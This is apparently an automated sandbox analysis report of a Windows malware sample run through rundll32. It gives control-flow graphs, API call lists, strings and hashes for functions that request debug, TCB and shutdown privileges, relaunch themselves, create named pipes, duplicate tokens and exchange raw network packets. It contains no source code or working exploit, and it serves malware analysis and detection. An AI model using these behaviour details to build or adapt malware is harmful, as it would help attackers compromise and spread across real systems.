                                              control_flow_graph 173 4bf79d7-4bf79ec call 4bf7897 176 4bf79ee-4bf79f7 call 4bf923f 173->176 177 4bf79fc-4bf7a03 call 4bf7f04 173->177 176->177 181 4bf7a0d-4bf7a14 177->181 182 4bf7a05-4bf7a07 ExitProcess 177->182 183 4bf7a1b-4bf7acf call 4bf84ee call 4bf10a7 WSAStartup call 4bf6c5f * 2 InitializeCriticalSection call 4bf652f call 4bf7dd0 call 4bf8192 CreateEventW CreateThread 181->183 184 4bf7a16 call 4bf7e8e 181->184 200 4bf7b99-4bf7ba0 183->200 201 4bf7ad5-4bf7ae8 CreateThread 183->201 184->183 204 4bf7bde-4bf7bf1 Sleep call 4bf8a23 200->204 205 4bf7ba2-4bf7baf call 4bf554a 200->205 202 4bf7aea-4bf7af1 201->202 203 4bf7af8-4bf7b0a call 4bf6cc8 201->203 202->203 206 4bf7af3 call 4bf7146 202->206 216 4bf7b0c-4bf7b31 call 4bf6c5f call 4bf85fb 203->216 217 4bf7b63-4bf7b93 call 4bf6cc8 CreateThread call 4bfa420 Sleep 203->217 212 4bf7bf6-4bf7c16 GetSystemDirectoryW 204->212 205->204 214 4bf7bb1 205->214 206->203 219 4bf7c1c-4bf7c30 lstrcatW 212->219 220 4bf7cc0-4bf7cc2 212->220 218 4bf7bb3-4bf7bcd 214->218 216->217 235 4bf7b33-4bf7b39 216->235 217->200 218->218 223 4bf7bcf-4bf7bd9 call 4bf636b 218->223 219->220 224 4bf7c36-4bf7c4b GetModuleFileNameW 219->224 223->204 224->220 228 4bf7c4d-4bf7c7a PathFindFileNameW wsprintfW 224->228 231 4bf7c7c-4bf7c80 228->231 231->231 234 4bf7c82-4bf7c87 231->234 237 4bf7c8a-4bf7c8e 234->237 236 4bf7b3c-4bf7b4c call 4bfa3b1 call 4bf796e 235->236 243 4bf7b4e-4bf7b56 call 4bf6e66 236->243 244 4bf7b5b-4bf7b61 236->244 237->237 239 4bf7c90-4bf7cba CreateProcessW ExitProcess 237->239 243->244 244->217 244->236
                                              APIs
                                                • Part of subcall function 04BF7897: GetTickCount.KERNEL32 ref: 04BF78AF
                                                • Part of subcall function 04BF7897: srand.MSVCRT ref: 04BF78B2
                                                • Part of subcall function 04BF7897: GetTickCount.KERNEL32 ref: 04BF78B9
                                                • Part of subcall function 04BF7897: GetModuleFileNameW.KERNEL32(04C07BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF7926
                                              • ExitProcess.KERNEL32 ref: 04BF7A07
                                                • Part of subcall function 04BF923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04BF79FC,?,?,?), ref: 04BF927B
                                                • Part of subcall function 04BF923F: memcpy.MSVCRT ref: 04BF9294
                                                • Part of subcall function 04BF923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04BF9303
                                                • Part of subcall function 04BF923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 04BF9323
                                              • WSAStartup.WS2_32(00000202,04C081E0), ref: 04BF7A3D
                                              • InitializeCriticalSection.KERNEL32(04C07B9C,00000008,04BF67F9,04BF682F,000000FF,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF7A80
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 04BF7AAD
                                              • CreateThread.KERNELBASE(00000000,00000000,04BF8A6F,00000000,00000000,00000000), ref: 04BF7AC6
                                              • CreateThread.KERNELBASE(00000000,00000000,04BF77D1,00000000,00000000,00000000), ref: 04BF7ADF
                                                • Part of subcall function 04BF7E8E: PathFileExistsW.KERNELBASE(?,?), ref: 04BF7EB1
                                                • Part of subcall function 04BF7E8E: GetCurrentProcess.KERNEL32(?,?), ref: 04BF7EC3
                                              • CreateThread.KERNELBASE(00000000,00000000,04BFA1A9,00000000,00000000,00000000), ref: 04BF7B78
                                                • Part of subcall function 04BFA420: GetProcessHeap.KERNEL32(00000008,00000004,771B0F10,?,00000000,?,?,04BF7B89,000000FF), ref: 04BFA436
                                                • Part of subcall function 04BFA420: HeapAlloc.KERNEL32(00000000,?,?,04BF7B89,000000FF), ref: 04BFA439
                                                • Part of subcall function 04BFA420: CreateThread.KERNELBASE(00000000,00000000,04BFA333,00000000,00000000,00000000), ref: 04BFA454
                                                • Part of subcall function 04BFA420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04BF7B89,000000FF), ref: 04BFA463
                                                • Part of subcall function 04BFA420: HeapFree.KERNEL32(00000000,?,?,04BF7B89,000000FF), ref: 04BFA466
                                              • Sleep.KERNELBASE(?,000000FF), ref: 04BF7B93
                                              • Sleep.KERNELBASE(?), ref: 04BF7BEB
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF7C0E
                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04BF7C28
                                              • GetModuleFileNameW.KERNEL32(04C07BC8,0000030C), ref: 04BF7C43
                                              • PathFindFileNameW.SHLWAPI(04C07BC8,?), ref: 04BF7C51
                                              • wsprintfW.USER32 ref: 04BF7C6B
                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF7CB3
                                              • ExitProcess.KERNEL32 ref: 04BF7CBA
                                                • Part of subcall function 04BF554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04BF5561
                                                • Part of subcall function 04BF554A: GetLastError.KERNEL32(?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF556B
                                                • Part of subcall function 04BF554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF5581
                                                • Part of subcall function 04BF554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF558E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
                                              • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                              • API String ID: 1016975789-3730106045
                                              • Opcode ID: 15823d742771a1972f8a277f626032a97b43b1d9888fe1a06dfabe480219fe3e
                                              • Instruction ID: e0de9c92009e6d306d02956b37556c4ce42079bc90fd2c84cfcc678603c32bdf
                                              • Opcode Fuzzy Hash: 15823d742771a1972f8a277f626032a97b43b1d9888fe1a06dfabe480219fe3e
                                              • Instruction Fuzzy Hash: F981A4B5500209BBEB10AFB4DC84F9E7BADEF05304F0444E6FB09A6091DA74BE59CB60
                                              Function 04BF7146 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 172memorythreadprocessCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00000000,?,04BF7AF8), ref: 04BF7164
                                                • Part of subcall function 04BF6F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04BF7170,00000000,?,04BF7AF8), ref: 04BF6F8E
                                                • Part of subcall function 04BF6F7C: GetProcAddress.KERNEL32(00000000), ref: 04BF6F95
                                                • Part of subcall function 04BF8313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04BF832A
                                                • Part of subcall function 04BF8313: LoadResource.KERNEL32(00000000), ref: 04BF8341
                                                • Part of subcall function 04BF8313: LockResource.KERNEL32(00000000), ref: 04BF8350
                                                • Part of subcall function 04BF8313: SizeofResource.KERNEL32(00000000), ref: 04BF8368
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04BF8384
                                                • Part of subcall function 04BF8313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04BF838D
                                                • Part of subcall function 04BF8313: memcpy.MSVCRT ref: 04BF839C
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04BF83B9
                                                • Part of subcall function 04BF8313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF83BC
                                                • Part of subcall function 04BF8313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04BF840A
                                                • Part of subcall function 04BF8313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04BF840D
                                              • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,04BF7AF8), ref: 04BF71AA
                                              • CoCreateGuid.OLE32(?,771B0F10,?,04BF7AF8), ref: 04BF71C8
                                              • StringFromCLSID.OLE32(?,?,?,04BF7AF8), ref: 04BF71E1
                                              • wsprintfW.USER32 ref: 04BF721F
                                              • CreateThread.KERNELBASE(00000000,00000000,04BF6FFE,?,00000000,00000000), ref: 04BF7236
                                              • memset.MSVCRT ref: 04BF7259
                                              • wsprintfW.USER32 ref: 04BF7281
                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF72A6
                                              • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 04BF72B8
                                                • Part of subcall function 04BF6CC8: EnterCriticalSection.KERNEL32(?,04BF7B03), ref: 04BF6CCD
                                                • Part of subcall function 04BF6CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 04BF6CD9
                                                • Part of subcall function 04BF6CC8: LeaveCriticalSection.KERNEL32(?), ref: 04BF6CE0
                                              • TerminateThread.KERNELBASE(?,00000000), ref: 04BF72CD
                                              • CloseHandle.KERNEL32(?), ref: 04BF72D6
                                              • DeleteFileW.KERNELBASE(?,?,?), ref: 04BF7306
                                              • CoTaskMemFree.OLE32(?,?,?,?,04BF7AF8), ref: 04BF730F
                                              • GetProcessHeap.KERNEL32(00000000,?,?,04BF7AF8), ref: 04BF732C
                                              • RtlFreeHeap.NTDLL(00000000,?,04BF7AF8), ref: 04BF7333
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
                                              • String ID: "%ws" %ws$\\.\pipe\%ws
                                              • API String ID: 1475553426-4065786000
                                              • Opcode ID: b78cb292bcd982d48bdb531c30b90693f4ff03c6b9f16c28bd0efda7475c131e
                                              • Instruction ID: 0769fbcebb5afedb630bd5e308d520288ff8166c907730df04da8f4427d856b8
                                              • Opcode Fuzzy Hash: b78cb292bcd982d48bdb531c30b90693f4ff03c6b9f16c28bd0efda7475c131e
                                              • Instruction Fuzzy Hash: 0851F9B5900219BFDF119FE4DC84DEEB7BDEF08204F1445A6F60AE3110EA35AE598B60
                                              Function 04BF21DC Relevance: 28.6, APIs: 19, Instructions: 129memorynetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,771AF380,?,?,?,?,?,?,?,?), ref: 04BF21F5
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF21FE
                                              • GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 04BF2210
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2213
                                              • htons.WS2_32(00000029), ref: 04BF222E
                                              • send.WS2_32(?,?,0000002D,00000000), ref: 04BF2255
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF2271
                                              • memset.MSVCRT ref: 04BF2297
                                              • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04BF22A3
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF22A6
                                              • htons.WS2_32(00000023), ref: 04BF22C1
                                              • send.WS2_32(?,?,00000027,00000000), ref: 04BF22DA
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF22F2
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2314
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2317
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2323
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2326
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2331
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2334
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsrecvsend$memset
                                              • String ID:
                                              • API String ID: 821554539-0
                                              • Opcode ID: eab37f8216f341fa2e2657f9bb79b2b08d6f327b5f0b30237c0a3bbd33633afa
                                              • Instruction ID: da87ce1a57f49c989df92fe7d0ba059298e2468071e9506b25e8aff4d5bf62a0
                                              • Opcode Fuzzy Hash: eab37f8216f341fa2e2657f9bb79b2b08d6f327b5f0b30237c0a3bbd33633afa
                                              • Instruction Fuzzy Hash: 02417E71A00305BFEB109FA5DC09F9E7BA8EF49754F008495FA499B280D679E908CB61
                                              Function 04BF46C7 Relevance: 25.3, APIs: 20, Instructions: 333memorysleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 337 4bf46c7-4bf46f4 GetProcessHeap HeapAlloc 338 4bf46fa-4bf4717 call 4bf2497 337->338 339 4bf4aa4 337->339 342 4bf471c-4bf471e 338->342 340 4bf4aab-4bf4ab2 339->340 343 4bf4724-4bf473f call 4bf3449 342->343 344 4bf47b1-4bf47bd GetProcessHeap HeapFree 342->344 343->344 347 4bf4741-4bf4743 343->347 344->340 348 4bf475a-4bf475c 347->348 349 4bf4745-4bf4756 call 4bf2e12 347->349 351 4bf4761-4bf4777 call 4bf29a2 348->351 349->344 354 4bf4758 349->354 357 4bf47cb 351->357 358 4bf4779-4bf4788 call 4bf21dc 351->358 356 4bf47ce-4bf47e7 call 4bf317c 354->356 356->344 365 4bf47e9-4bf4800 GetProcessHeap HeapAlloc 356->365 357->356 363 4bf47ae 358->363 364 4bf478a-4bf47a6 Sleep call 4bf2191 358->364 363->344 371 4bf47a8-4bf47ac 364->371 372 4bf47c2-4bf47c9 364->372 365->344 367 4bf4802-4bf4806 365->367 369 4bf480c-4bf481b GetProcessHeap HeapAlloc 367->369 370 4bf4959-4bf495d 367->370 375 4bf487e-4bf4882 369->375 376 4bf481d-4bf486c call 4bf3209 369->376 373 4bf495f-4bf4964 370->373 374 4bf49a6-4bf49df GetProcessHeap HeapAlloc 370->374 371->363 377 4bf475e 371->377 372->363 373->374 380 4bf4966-4bf49a2 373->380 374->375 381 4bf49e5-4bf4a3c call 4bf33a4 374->381 378 4bf4888-4bf48a4 Sleep GetProcessHeap HeapAlloc 375->378 379 4bf4a91-4bf4a9f GetProcessHeap HeapFree 375->379 387 4bf486e 376->387 388 4bf4872-4bf4878 GetProcessHeap HeapFree 376->388 377->351 378->379 384 4bf48aa-4bf4928 call 4bf32af GetProcessHeap HeapFree 378->384 379->344 380->374 381->388 390 4bf4a42-4bf4a49 381->390 392 4bf492e-4bf494e 384->392 393 4bf4a52-4bf4a70 call 4bf3680 384->393 387->388 388->375 390->393 392->379 395 4bf4954-4bf4956 392->395 397 4bf4a8e 393->397 398 4bf4a72-4bf4a88 call 4bf41e9 393->398 395->370 397->379 398->397 401 4bf4a8a 398->401 401->397
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 04BF46E4
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF46E7
                                                • Part of subcall function 04BF2497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24AF
                                                • Part of subcall function 04BF2497: HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24B8
                                                • Part of subcall function 04BF2497: GetProcessHeap.KERNEL32(00000008,00001124,771AF380,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24CD
                                                • Part of subcall function 04BF2497: HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24D0
                                                • Part of subcall function 04BF2497: rand.MSVCRT ref: 04BF24E1
                                                • Part of subcall function 04BF2497: htons.WS2_32(00001120), ref: 04BF24FF
                                                • Part of subcall function 04BF2497: rand.MSVCRT ref: 04BF255F
                                                • Part of subcall function 04BF2497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF2576
                                                • Part of subcall function 04BF2497: HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF257D
                                                • Part of subcall function 04BF2497: htons.WS2_32(0000015C), ref: 04BF259F
                                                • Part of subcall function 04BF2497: rand.MSVCRT ref: 04BF25CD
                                              • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04BF478F
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 04BF47B4
                                              • HeapFree.KERNEL32(00000000), ref: 04BF47B7
                                              • GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 04BF47F0
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF47F9
                                              • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04BF4810
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4813
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 04BF4875
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4878
                                              • Sleep.KERNEL32(000007D0), ref: 04BF488D
                                              • GetProcessHeap.KERNEL32(00000008,00000029), ref: 04BF4897
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF489A
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 04BF4911
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4914
                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 04BF49D2
                                                • Part of subcall function 04BF2E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04BF2E32
                                                • Part of subcall function 04BF2E12: HeapAlloc.KERNEL32(00000000), ref: 04BF2E3B
                                                • Part of subcall function 04BF2E12: GetProcessHeap.KERNEL32(00000008,00000048,771AF380), ref: 04BF2E4D
                                                • Part of subcall function 04BF2E12: HeapAlloc.KERNEL32(00000000), ref: 04BF2E50
                                                • Part of subcall function 04BF2E12: htons.WS2_32(00000044), ref: 04BF2E68
                                                • Part of subcall function 04BF2E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04BF2EF3
                                                • Part of subcall function 04BF2E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04BF2F0B
                                                • Part of subcall function 04BF2E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF2F31
                                                • Part of subcall function 04BF2E12: HeapFree.KERNEL32(00000000), ref: 04BF2F38
                                                • Part of subcall function 04BF2E12: GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2F43
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF49D5
                                                • Part of subcall function 04BF3680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,771AF380,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF3698
                                                • Part of subcall function 04BF3680: HeapAlloc.KERNEL32(00000000,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36A1
                                                • Part of subcall function 04BF3680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36B1
                                                • Part of subcall function 04BF3680: HeapAlloc.KERNEL32(00000000,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36B4
                                                • Part of subcall function 04BF3680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36C7
                                                • Part of subcall function 04BF3680: HeapAlloc.KERNEL32(00000000,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF36CA
                                                • Part of subcall function 04BF3680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,04BF4A6E,?,?,?,?,00000000,?), ref: 04BF37A2
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF4A96
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4A99
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
                                              • String ID:
                                              • API String ID: 3041643382-0
                                              • Opcode ID: c9a7f14345732d78dab806f9e360a6f65746093f327ec7b6df371fd1e943d760
                                              • Instruction ID: fab5ae1f396929f9990e14213c3fa4e6cc4eadcd0b36708453dc8d545c773737
                                              • Opcode Fuzzy Hash: c9a7f14345732d78dab806f9e360a6f65746093f327ec7b6df371fd1e943d760
                                              • Instruction Fuzzy Hash: 91C1BE71500346EADB10CFA4CC04BABBBB5FF59304F00849AFA99D7690E774E958DBA4
                                              Function 04BFA1A9 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 149memorylibraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 402 4bfa1a9-4bfa1c7 403 4bfa1c9-4bfa1cb call 4bfa016 402->403 404 4bfa1d0-4bfa1fa GetProcessHeap HeapAlloc 402->404 403->404 406 4bfa32a-4bfa330 404->406 407 4bfa200-4bfa213 GetProcessHeap HeapAlloc 404->407 407->406 408 4bfa219-4bfa229 call 4bf6b0e 407->408 408->406 411 4bfa22f-4bfa235 408->411 412 4bfa245-4bfa24c 411->412 413 4bfa24e-4bfa260 CreateThread 412->413 414 4bfa271 412->414 415 4bfa266-4bfa26f 413->415 416 4bfa322-4bfa325 call 4bf6b46 413->416 417 4bfa275 414->417 415->417 416->406 419 4bfa277-4bfa27b 417->419 420 4bfa27d-4bfa284 419->420 421 4bfa286-4bfa2af GetModuleHandleA GetProcAddress 419->421 420->419 420->421 421->416 423 4bfa2b1-4bfa2b6 421->423 424 4bfa2b8-4bfa2be 423->424 425 4bfa2d3-4bfa2d6 423->425 426 4bfa2c0-4bfa2c5 424->426 427 4bfa2ea-4bfa2f7 GetProcessHeap HeapAlloc 425->427 428 4bfa2d8-4bfa2e7 CloseHandle 425->428 429 4bfa2ce-4bfa2d1 426->429 430 4bfa2c7-4bfa2ca 426->430 427->416 431 4bfa2f9-4bfa30c GetProcessHeap HeapAlloc 427->431 428->427 429->427 430->426 432 4bfa2cc 430->432 431->416 433 4bfa30e-4bfa315 call 4bf6ad0 431->433 432->427 435 4bfa31a-4bfa31c 433->435 435->416 436 4bfa237-4bfa243 435->436 436->412
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 04BFA1EB
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BFA1F4
                                              • GetProcessHeap.KERNEL32(00000008,00000021), ref: 04BFA209
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BFA20C
                                              • CreateThread.KERNELBASE(00000000,00000000,04BFA112,00000000,00000000,00000000), ref: 04BFA258
                                              • GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 04BFA290
                                              • GetProcAddress.KERNEL32(00000000), ref: 04BFA297
                                              • CloseHandle.KERNEL32(00000000), ref: 04BFA2E1
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 04BFA2EE
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BFA2F1
                                                • Part of subcall function 04BFA016: GetCurrentThread.KERNEL32 ref: 04BFA035
                                                • Part of subcall function 04BFA016: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BFA1D0,00000000), ref: 04BFA03C
                                                • Part of subcall function 04BFA016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 04BFA059
                                                • Part of subcall function 04BFA016: CloseHandle.KERNEL32(?,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BFA0F5
                                                • Part of subcall function 04BFA016: CloseHandle.KERNEL32(0000FFFF,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BFA105
                                              • GetProcessHeap.KERNEL32(00000008,00000021), ref: 04BFA2FD
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BFA300
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
                                              • String ID: WaitForMultipleObjects$kernel32
                                              • API String ID: 2880803415-195431251
                                              • Opcode ID: e4a2b8013d872dbddd439393edc8b01b75ec43828463d454773414efe2824df5
                                              • Instruction ID: bad997a095533796462587219c3f44f851cc37a49d0d4cf42eff832c27a77a5a
                                              • Opcode Fuzzy Hash: e4a2b8013d872dbddd439393edc8b01b75ec43828463d454773414efe2824df5
                                              • Instruction Fuzzy Hash: 71417271B10205ABDF189FF8DC45BAEB7B8FB4C310F104569E61DE7280EB74A9458B60
                                              Function 04BF5337 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 157memorynetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
